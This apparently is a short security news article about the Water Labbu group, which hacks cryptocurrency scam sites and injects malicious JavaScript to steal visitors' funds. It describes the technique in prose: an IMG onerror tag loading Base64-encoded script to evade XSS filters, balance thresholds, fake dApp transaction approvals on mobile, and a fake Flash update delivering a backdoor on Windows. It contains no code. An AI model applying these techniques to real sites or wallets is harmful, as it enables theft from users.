While some attackers were creating cryptocurrency scam sites, others were learning how to hack them. An example of this was the Water Labbu gang, where hackers break into fraudulent websites and inject their malicious JS code into their HTML.
The group does not come into contact with the victims and leave all social engineering to the scammers. According to analysts, Water Labbu hacked at least 45 scam websites and made about $316,000.
After analyzing one of the hacked sites, experts discovered that the group had injected an IMG tag to load malicious Base64-encoded JS code using the “onerror” event, thereby bypassing XSS filters.
The injected malicious code creates a script that downloads another script from the attackers' server. The last script collects TetherUSD and Ethereum wallet addresses and balances.
If the victim's balance exceeds 0.005 ETH or 22,000 USDT, Water Labbu starts the attack by determining the target OS (Windows, Android or iOS). Then there are two scenarios for the development of events:
- The victim has a mobile device. The malicious script then sends a transaction approval request through a dApp (Decentralized Application) that pretends to be a scam site. If the victim agrees to conduct the transaction, then the malicious script collects all the funds from the target's wallet and sends them to the Water Labbu wallet;
- The victim has a Windows device. In this case, the hacked sites show a fake Flash Player update notification overlaid on the scam site. By agreeing to the “upgrade”, the target is actually downloading the backdoor. This backdoor is used to steal crypto wallet data and cookies from the victim's device.
Despite all these machinations, the outcome for the victims is the same: the loss of all their cryptocurrency. The money just goes not to the creators of the scam site, but to Water Labbu.
Comments 0